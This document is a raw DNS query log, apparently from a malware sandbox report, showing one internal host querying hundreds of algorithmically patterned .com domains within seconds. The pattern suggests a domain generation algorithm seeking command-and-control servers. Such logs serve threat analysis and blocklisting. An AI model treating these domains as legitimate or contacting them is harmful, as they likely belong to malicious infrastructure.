                                                                                                                                                                                                              Aug 23, 2024 18:47:43.994611025 CEST192.168.2.41.1.1.10x9c76Standard query (0)puvyxil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.996454000 CEST192.168.2.41.1.1.10xa156Standard query (0)gahyqah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.997402906 CEST192.168.2.41.1.1.10x8de6Standard query (0)lyryfyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.998368025 CEST192.168.2.41.1.1.10x8a4aStandard query (0)vocyzit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:43.999161959 CEST192.168.2.41.1.1.10xd256Standard query (0)qegyqaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.000152111 CEST192.168.2.41.1.1.10xef15Standard query (0)purydyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.002085924 CEST192.168.2.41.1.1.10xb2b7Standard query (0)gacyzuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.005590916 CEST192.168.2.41.1.1.10x9c94Standard query (0)lygymoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.006455898 CEST192.168.2.41.1.1.10xb193Standard query (0)vowydef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.007169962 CEST192.168.2.41.1.1.10x3471Standard query (0)qexylup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.008037090 CEST192.168.2.41.1.1.10xc36fStandard query (0)pufymoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.009016991 CEST192.168.2.41.1.1.10xe823Standard query (0)gaqydeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.009788990 CEST192.168.2.41.1.1.10xf2ecStandard query (0)lyxylux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.010381937 CEST192.168.2.41.1.1.10xb131Standard query (0)vofymik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.011153936 CEST192.168.2.41.1.1.10xdecbStandard query (0)qeqysag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.011753082 CEST192.168.2.41.1.1.10x5e94Standard query (0)puzylyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.014139891 CEST192.168.2.41.1.1.10xe8caStandard query (0)lymysan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.014770985 CEST192.168.2.41.1.1.10xec34Standard query (0)volykyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.015391111 CEST192.168.2.41.1.1.10x3a80Standard query (0)qedynul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.015984058 CEST192.168.2.41.1.1.10x1fe2Standard query (0)pumypog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.016774893 CEST192.168.2.41.1.1.10xdf0dStandard query (0)galykes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.017678022 CEST192.168.2.41.1.1.10xc663Standard query (0)lysynur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.018395901 CEST192.168.2.41.1.1.10xeb14Standard query (0)vonypom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.019260883 CEST192.168.2.41.1.1.10x5b6dStandard query (0)qekykev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.041146040 CEST192.168.2.41.1.1.10x794fStandard query (0)pupybul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.060003996 CEST192.168.2.41.1.1.10x49abStandard query (0)ganypih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.060467958 CEST192.168.2.41.1.1.10xc189Standard query (0)lykyjad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.060549974 CEST192.168.2.41.1.1.10x964cStandard query (0)vopybyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.060830116 CEST192.168.2.41.1.1.10xe658Standard query (0)qebytiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.061041117 CEST192.168.2.41.1.1.10xd3beStandard query (0)pujyjav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.064866066 CEST192.168.2.41.1.1.10x9c8Standard query (0)gatyvyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.065064907 CEST192.168.2.41.1.1.10xadc6Standard query (0)lyvytuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.065272093 CEST192.168.2.41.1.1.10x9721Standard query (0)vojyjof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.065653086 CEST192.168.2.41.1.1.10xcd37Standard query (0)qetyvep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.065653086 CEST192.168.2.41.1.1.10xb600Standard query (0)puvytuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.065845013 CEST192.168.2.41.1.1.10x6dfcStandard query (0)gahyhob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.198863029 CEST192.168.2.41.1.1.10x494dStandard query (0)lyryvex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.199259043 CEST192.168.2.41.1.1.10x4561Standard query (0)vocyruk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.199601889 CEST192.168.2.41.1.1.10x6ad9Standard query (0)qegyhig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.199825048 CEST192.168.2.41.1.1.10x105eStandard query (0)purycap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.200206995 CEST192.168.2.41.1.1.10x5d43Standard query (0)gacyryw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.200620890 CEST192.168.2.41.1.1.10xad2Standard query (0)lygygin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.201368093 CEST192.168.2.41.1.1.10x7e02Standard query (0)vowycac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.202778101 CEST192.168.2.41.1.1.10x99e7Standard query (0)qexyryl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.203243017 CEST192.168.2.41.1.1.10x5cd7Standard query (0)pufygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.203408957 CEST192.168.2.41.1.1.10x7301Standard query (0)gaqycos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.203697920 CEST192.168.2.41.1.1.10xeae8Standard query (0)lyxywer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.205009937 CEST192.168.2.41.1.1.10xc9c8Standard query (0)vofygum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.205390930 CEST192.168.2.41.1.1.10x668aStandard query (0)qeqyxov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.206001043 CEST192.168.2.41.1.1.10x7c0bStandard query (0)puzywel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.206231117 CEST192.168.2.41.1.1.10xfdcfStandard query (0)gadyfuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:44.206832886 CEST192.168.2.41.1.1.10xbe21Standard query (0)lymyxid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:46.270370007 CEST192.168.2.41.1.1.10x61b4Standard query (0)lygyvuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.304891109 CEST192.168.2.41.1.1.10xbf1fStandard query (0)lyxynir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.305859089 CEST192.168.2.41.1.1.10x5d0Standard query (0)vofypam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.306653023 CEST192.168.2.41.1.1.10xa2cStandard query (0)qeqykyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.310770988 CEST192.168.2.41.1.1.10x914fStandard query (0)puzybil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.311697960 CEST192.168.2.41.1.1.10x8dd7Standard query (0)gadypah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.312558889 CEST192.168.2.41.1.1.10x1c51Standard query (0)lymyjyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.312881947 CEST192.168.2.41.1.1.10x31dStandard query (0)volybut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.313781977 CEST192.168.2.41.1.1.10x67e2Standard query (0)pumyjev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.313868999 CEST192.168.2.41.1.1.10xbe72Standard query (0)qedytoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.314661026 CEST192.168.2.41.1.1.10xdff3Standard query (0)lysytoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.314800978 CEST192.168.2.41.1.1.10x19deStandard query (0)galyvuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.315795898 CEST192.168.2.41.1.1.10xa183Standard query (0)vonyjef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.316380024 CEST192.168.2.41.1.1.10xebc1Standard query (0)qekyvup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.317368984 CEST192.168.2.41.1.1.10x7617Standard query (0)pupytiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.318161964 CEST192.168.2.41.1.1.10xd23aStandard query (0)ganyhab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.318479061 CEST192.168.2.41.1.1.10x61ffStandard query (0)lykyvyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.319293976 CEST192.168.2.41.1.1.10xf83aStandard query (0)vopyrik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.319479942 CEST192.168.2.41.1.1.10x92dStandard query (0)pujycyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.319598913 CEST192.168.2.41.1.1.10xa669Standard query (0)qebyhag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.320473909 CEST192.168.2.41.1.1.10x23dfStandard query (0)gatyruw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.320872068 CEST192.168.2.41.1.1.10xde1fStandard query (0)lyvygon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.321798086 CEST192.168.2.41.1.1.10xc6a3Standard query (0)vojycec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.322367907 CEST192.168.2.41.1.1.10x2d53Standard query (0)qetyrul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.323297977 CEST192.168.2.41.1.1.10xc5a0Standard query (0)puvygog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.323925972 CEST192.168.2.41.1.1.10x76edStandard query (0)gahyces.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.324670076 CEST192.168.2.41.1.1.10x4b5aStandard query (0)lyrywur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.324985027 CEST192.168.2.41.1.1.10xbb51Standard query (0)vocygim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.326898098 CEST192.168.2.41.1.1.10x540dStandard query (0)qegyxav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.327786922 CEST192.168.2.41.1.1.10x5976Standard query (0)purywyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.328895092 CEST192.168.2.41.1.1.10xc7e2Standard query (0)gacyfih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.329237938 CEST192.168.2.41.1.1.10xceaeStandard query (0)lygyxad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.329687119 CEST192.168.2.41.1.1.10x2559Standard query (0)qexyfuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.329725027 CEST192.168.2.41.1.1.10x6ac1Standard query (0)vowyqyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.330248117 CEST192.168.2.41.1.1.10x630Standard query (0)pufyxov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.330523968 CEST192.168.2.41.1.1.10x4dd4Standard query (0)gaqyqez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.330625057 CEST192.168.2.41.1.1.10x45c0Standard query (0)lyxyfuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.331185102 CEST192.168.2.41.1.1.10xc924Standard query (0)vofyzof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.331590891 CEST192.168.2.41.1.1.10x2bebStandard query (0)qeqyqep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.331671953 CEST192.168.2.41.1.1.10x935Standard query (0)puzyduq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.332353115 CEST192.168.2.41.1.1.10xf90fStandard query (0)gadyzib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.332806110 CEST192.168.2.41.1.1.10x99dcStandard query (0)lymymax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.332865953 CEST192.168.2.41.1.1.10xaf6aStandard query (0)volydyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.333395958 CEST192.168.2.41.1.1.10x7105Standard query (0)qedylig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.333802938 CEST192.168.2.41.1.1.10xe279Standard query (0)galydyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.333952904 CEST192.168.2.41.1.1.10x723eStandard query (0)pumymap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.334290981 CEST192.168.2.41.1.1.10x9680Standard query (0)lysylun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.334804058 CEST192.168.2.41.1.1.10xc276Standard query (0)vonymoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.334922075 CEST192.168.2.41.1.1.10xc58cStandard query (0)qekysel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.335546970 CEST192.168.2.41.1.1.10x352cStandard query (0)pupylug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.335745096 CEST192.168.2.41.1.1.10x4371Standard query (0)ganynos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.336077929 CEST192.168.2.41.1.1.10xcb9cStandard query (0)lykyser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.336649895 CEST192.168.2.41.1.1.10x9521Standard query (0)vopykum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.337029934 CEST192.168.2.41.1.1.10xd36dStandard query (0)qebyniv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.337173939 CEST192.168.2.41.1.1.10x35baStandard query (0)pujypal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.337801933 CEST192.168.2.41.1.1.10x8295Standard query (0)gatykyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.337858915 CEST192.168.2.41.1.1.10xa81bStandard query (0)lyvynid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.338368893 CEST192.168.2.41.1.1.10x1d0bStandard query (0)vojypat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.338383913 CEST192.168.2.41.1.1.10x32b2Standard query (0)qetykyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.339353085 CEST192.168.2.41.1.1.10xceafStandard query (0)puvybuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.339840889 CEST192.168.2.41.1.1.10xed1cStandard query (0)gahypoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.340034962 CEST192.168.2.41.1.1.10xe346Standard query (0)lyryjej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.340312004 CEST192.168.2.41.1.1.10x9311Standard query (0)vocybuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.340643883 CEST192.168.2.41.1.1.10x39efStandard query (0)qegytop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:47.341439009 CEST192.168.2.41.1.1.10x8c5eStandard query (0)puryjeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.681747913 CEST192.168.2.41.1.1.10xb51cStandard query (0)gacyvub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.682568073 CEST192.168.2.41.1.1.10x2721Standard query (0)lygytix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.683495998 CEST192.168.2.41.1.1.10x8d56Standard query (0)vowyjak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.684355974 CEST192.168.2.41.1.1.10x204fStandard query (0)qexyvyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.685098886 CEST192.168.2.41.1.1.10x6315Standard query (0)pufytip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.685977936 CEST192.168.2.41.1.1.10xc6f9Standard query (0)gaqyhaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.686530113 CEST192.168.2.41.1.1.10xbf65Standard query (0)lyxyvyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.687277079 CEST192.168.2.41.1.1.10xd348Standard query (0)vofyruc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.688019991 CEST192.168.2.41.1.1.10x8ec5Standard query (0)qeqyhol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.688704014 CEST192.168.2.41.1.1.10xdb1eStandard query (0)puzyceg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.689310074 CEST192.168.2.41.1.1.10xef58Standard query (0)gadyrus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.689846039 CEST192.168.2.41.1.1.10xa753Standard query (0)lymygor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.690622091 CEST192.168.2.41.1.1.10x7325Standard query (0)volycem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.691386938 CEST192.168.2.41.1.1.10x148aStandard query (0)qedyruv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.691927910 CEST192.168.2.41.1.1.10x60e2Standard query (0)pumygil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.692579031 CEST192.168.2.41.1.1.10x8e0cStandard query (0)galycah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.693273067 CEST192.168.2.41.1.1.10xdd99Standard query (0)lysywyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.693808079 CEST192.168.2.41.1.1.10xdd6eStandard query (0)vonygit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.694251060 CEST192.168.2.41.1.1.10x81Standard query (0)qekyxaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.694616079 CEST192.168.2.41.1.1.10xf8cStandard query (0)pupywyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.694917917 CEST192.168.2.41.1.1.10xd87bStandard query (0)ganyfuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.695343018 CEST192.168.2.41.1.1.10xcb0cStandard query (0)lykyxoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.695838928 CEST192.168.2.41.1.1.10xa08eStandard query (0)vopyqef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.696180105 CEST192.168.2.41.1.1.10x35e5Standard query (0)qebyfup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.696855068 CEST192.168.2.41.1.1.10x287cStandard query (0)pujyxoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.697604895 CEST192.168.2.41.1.1.10x3c8aStandard query (0)gatyqeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.698508978 CEST192.168.2.41.1.1.10x96feStandard query (0)lyvyfux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.699282885 CEST192.168.2.41.1.1.10xb120Standard query (0)vojyzik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.699897051 CEST192.168.2.41.1.1.10xce61Standard query (0)qetyqag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.701801062 CEST192.168.2.41.1.1.10xb44bStandard query (0)puvydyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.702805042 CEST192.168.2.41.1.1.10x6842Standard query (0)gahyziw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.703695059 CEST192.168.2.41.1.1.10x7f22Standard query (0)lyryman.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.704391003 CEST192.168.2.41.1.1.10x7857Standard query (0)vocydyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.704401970 CEST192.168.2.41.1.1.10xbe85Standard query (0)qegylul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.705070972 CEST192.168.2.41.1.1.10x3833Standard query (0)gacydes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.705096006 CEST192.168.2.41.1.1.10xd299Standard query (0)purymog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.705296993 CEST192.168.2.41.1.1.10x3595Standard query (0)lygylur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.705893040 CEST192.168.2.41.1.1.10x6013Standard query (0)qexysev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.705916882 CEST192.168.2.41.1.1.10xd504Standard query (0)vowymom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.706132889 CEST192.168.2.41.1.1.10xaba0Standard query (0)pufylul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.706653118 CEST192.168.2.41.1.1.10xb73Standard query (0)gaqynih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.706705093 CEST192.168.2.41.1.1.10x79ceStandard query (0)vofykyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.706845999 CEST192.168.2.41.1.1.10x41ddStandard query (0)lyxysad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.707401991 CEST192.168.2.41.1.1.10xefa4Standard query (0)qeqyniq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.707562923 CEST192.168.2.41.1.1.10xd04eStandard query (0)puzypav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.707705021 CEST192.168.2.41.1.1.10x25e4Standard query (0)gadykyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.708287001 CEST192.168.2.41.1.1.10xf6edStandard query (0)lymynuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.708472967 CEST192.168.2.41.1.1.10xf5c8Standard query (0)volypof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.708842993 CEST192.168.2.41.1.1.10x1bacStandard query (0)pumybuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.708870888 CEST192.168.2.41.1.1.10x58e0Standard query (0)galypob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.709515095 CEST192.168.2.41.1.1.10xb3e0Standard query (0)qekytig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.709573030 CEST192.168.2.41.1.1.10x3206Standard query (0)lysyjex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.709748030 CEST192.168.2.41.1.1.10xeae8Standard query (0)vonybuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.710057020 CEST192.168.2.41.1.1.10xc3a4Standard query (0)pupyjap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.710475922 CEST192.168.2.41.1.1.10x5568Standard query (0)lykytin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.712285995 CEST192.168.2.41.1.1.10x2a94Standard query (0)ganyvyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.712502956 CEST192.168.2.41.1.1.10xb953Standard query (0)qebyvyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.712768078 CEST192.168.2.41.1.1.10xd534Standard query (0)pujytug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.712949991 CEST192.168.2.41.1.1.10x9d66Standard query (0)gatyhos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.713109970 CEST192.168.2.41.1.1.10x9936Standard query (0)lyvyver.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.713279963 CEST192.168.2.41.1.1.10xe973Standard query (0)vojyrum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.713457108 CEST192.168.2.41.1.1.10xba0bStandard query (0)qetyhov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.713886976 CEST192.168.2.41.1.1.10x9bbbStandard query (0)qedykep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Aug 23, 2024 18:47:48.714263916 CEST192.168.2.41.1.1.10x3762Standard query (0)vopyjac.comA (IP address)IN (0x0001)false
